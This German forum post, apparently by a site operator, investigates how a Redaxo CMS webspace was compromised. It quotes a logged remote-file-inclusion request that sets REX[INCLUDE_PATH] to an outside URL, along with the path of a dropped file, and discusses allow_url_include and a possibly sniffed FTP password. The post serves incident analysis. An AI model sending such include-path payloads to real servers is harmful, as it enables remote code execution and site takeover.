huhu ..
ich habe mir also die logfiles angesehen ..
und leider lässt sich, anhand dieser, nicht feststellen wie die ersten kompromitierenden dateien auf den server gekommen sind ..
es ist aber stark anzunehmen das der webspace bereits manipuliert war als redaxo zwecks cross-site skripting angesprungen wurde
der erste verdächtige logeintrag den ich finden konnte sieht ca. so aus ..:
Code: Alles auswählen
/index.php?article_id=4//redaxo/login.php?REX[INCLUDE_PATH]=http://www.....
auffällig dabei ist das in der redaxo version die damals installiert war gar keine datei
/redaxo/login.php
vorhanden sein sollte
entweder hatte sie jemand dort schon erstellt oder einfach vermutet das es sie dort gibt .. ärgere mich gerade das ich das alles schon gelöscht habe
dannach sehen die verdächtigen zeilen ca so aus :
und schliesslich dann nachdem es gelungen war dateien in dem webspace zu erstellen so :
//redaxo/include//generated/templates/fx29id1.txt??
bei dem umfang der manipulation, die ich vorfand: "mehrere dateien in verschiedenen ordnern und geänderter .htacces datei" befürchte ich es hat jemand das ftp passwort erschnüffelt .. obwohl es kein einfaches war ..
der webserver ist übrigens apache 2.2 mit php 5.x
auf dem webspace war bzw ist allow_url_include erlaubt, wo ich persönlich das nicht so gut finde, als default einstellung ..
wie dem auch sei .. jedenfalls geht es hier nicht wirklich um einen redaxo bug .. daher viellicht den threat verschieben .. ?